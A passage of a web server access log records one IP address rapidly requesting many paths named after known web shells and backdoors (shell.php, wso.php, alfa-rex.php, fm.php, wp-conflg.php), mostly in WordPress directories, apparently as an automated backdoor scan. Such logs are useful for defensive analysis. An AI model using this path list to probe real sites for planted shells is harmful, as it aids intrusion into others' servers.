(KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:31 -0500] "GET /404.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:31 -0500] "GET /.well-known/acme-challenge/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:32 -0500] "GET /repeater.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:32 -0500] "GET /shell.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:32 -0500] "GET /.well-known/acme-challenge/class_api.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:33 -0500] "GET /wp-content/themes/finley/min.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:34 -0500] "GET /wp-content/wp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:34 -0500] "GET /uploads/up.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:24:34 -0500] "GET /wp-includes/random_compat/bala.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:35 -0500] "GET /wp-includes/themes.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:35 -0500] "GET /assets/images/niil.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:24:36 -0500] "GET /bak.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:36 -0500] "GET /wp-includes/assets/script-loader-packages.min.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:37 -0500] "GET /wp-content/plugins/pwnd/block-support.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:37 -0500] "GET /wp-includes/js/tinymce/skins/lightgray/img/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:24:37 -0500] "GET /wp-includes/wp-load.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:37 -0500] "GET /cux.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:37 -0500] "GET /.well-known/pki-validation/upfile.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:39 -0500] "GET /.well-known/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:39 -0500] "GET /.well-known/acme-challenge/my1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:39 -0500] "GET /wp-admin/shell.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:40 -0500] "GET /wp-admin/css/colors/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:40 -0500] "GET /cc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:40 -0500] "GET /wp-22.php?sxallsitemap.xml HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:40 -0500] "GET /.well-known/pki-validation/xmrlpc.php?p= HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:24:41 -0500] "GET /smm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:41 -0500] "GET /wp-includes/Text/Diff/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:41 -0500] "GET /wso-x569.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:24:41 -0500] "GET /header.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:42 -0500] "GET /wp-content/themes/news-portal/error.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:42 -0500] "GET /a1vx.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:35 -0500] "GET /p/wp-content/themes/astra/inc/ki1k.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:35 -0500] "GET /js/fm.php/ HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:36 -0500] "GET /lf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:36 -0500] "GET /bala.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:36 -0500] "GET /blog.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:38 -0500] "GET /readme.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:38 -0500] "GET /Njima.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:38 -0500] "GET /hehehehe.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:38 -0500] "GET /fm.php?fm=true HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:38 -0500] "GET /r.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:39 -0500] "GET /wp-includes/ID3/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:39 -0500] "GET /click.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:24:40 -0500] "GET /wp-admin/options.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:41 -0500] "GET /wp-admin/wso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:42 -0500] "GET /wp-activate.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:43 -0500] "GET /.well-known/pki-validation/dbform69.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:43 -0500] "GET /class.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:43 -0500] "GET /wp-admin/js/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:43 -0500] "GET /wp-includes/block-supports/utils.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:44 -0500] "GET /assets/images/doc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:42 -0500] "GET /wp-includes/Requests/Proxy/HTTP.term.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:42 -0500] "GET /wp-content/uploads/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:43 -0500] "GET /wp_class_datalib.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:44 -0500] "GET /function/function.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:44 -0500] "GET /wp-content/themes/twentyfive/include.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:45 -0500] "GET /.well-known/pki-validation/x.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:45 -0500] "GET /about.php?525 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:46 -0500] "GET /wp-includes/pomo/db-update.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:46 -0500] "GET /wp-content/plugins/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:46 -0500] "GET /css.php/cloud.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:46 -0500] "GET /goat.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:47 -0500] "GET /admin/controller/extension/extension/ultra.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:47 -0500] "GET /wp-comments.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:24:48 -0500] "GET /tx17.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:48 -0500] "GET /wp-content/goods.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:48 -0500] "GET /admin/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:49 -0500] "GET /wp-includes.bak/html-api/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:49 -0500] "GET /wp-content/themes/newstoday/lang.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:50 -0500] "GET /wp-includes/customize/sx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:44 -0500] "GET /wp-includes/css/about.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:44 -0500] "GET /kex.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:45 -0500] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:45 -0500] "GET /wp.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:45 -0500] "GET /wp-admin/custom-plugin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:24:46 -0500] "GET /wp-content/upgrade-temp-backup/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:47 -0500] "GET /edit-tags.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:47 -0500] "GET /wp-content/plugins/erinyani/asasx.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:47 -0500] "GET /wp-includes/SimplePie/ini_db_model.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:24:48 -0500] "GET /wp-content/plugins/seoo/wsoyanz.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:24:48 -0500] "GET /about.php?520 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:49 -0500] "GET /footer.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:24:49 -0500] "GET /dex.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:49 -0500] "GET /.well-known/pki-validation/muse.php?p= HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:50 -0500] "GET /wsoyanz.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:51 -0500] "GET /wp-content/themes/themes.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:51 -0500] "GET /wp-includes/SimplePie/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:24:51 -0500] "GET /app/webroot/filemanager.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:24:52 -0500] "GET /0.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:50 -0500] "GET /02.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:50 -0500] "GET /f35.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 194.5.82.85 - - [20/Dec/2025:15:24:50 -0500] "GET /randkeyword.PhP7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:51 -0500] "GET /Yanzmini.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:51 -0500] "GET /wp-admin/includes/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:52 -0500] "GET /wp-content/themes/newsfeed-theme/bbh.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:52 -0500] "GET /wp-admin/user/cloud.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:24:53 -0500] "GET /wp-content/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:53 -0500] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:24:53 -0500] "GET /wp-content/user-new.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:53 -0500] "GET /system.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:54 -0500] "GET /wp-admin/mah.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:55 -0500] "GET /network_xo.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:55 -0500] "GET /wp-content/plugins/alfa-rex.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:24:55 -0500] "GET /wp-admin/network/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:56 -0500] "GET /gecko.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:56 -0500] "GET /wp-admin/edit.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:24:56 -0500] "GET /wp-admin/404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:56 -0500] "GET /.well-known/acme-challenge/atomlib.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:57 -0500] "GET /ioxi-rex4.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:52 -0500] "GET /wp-content/themes/wp-pridmag/init.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:52 -0500] "GET /million.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 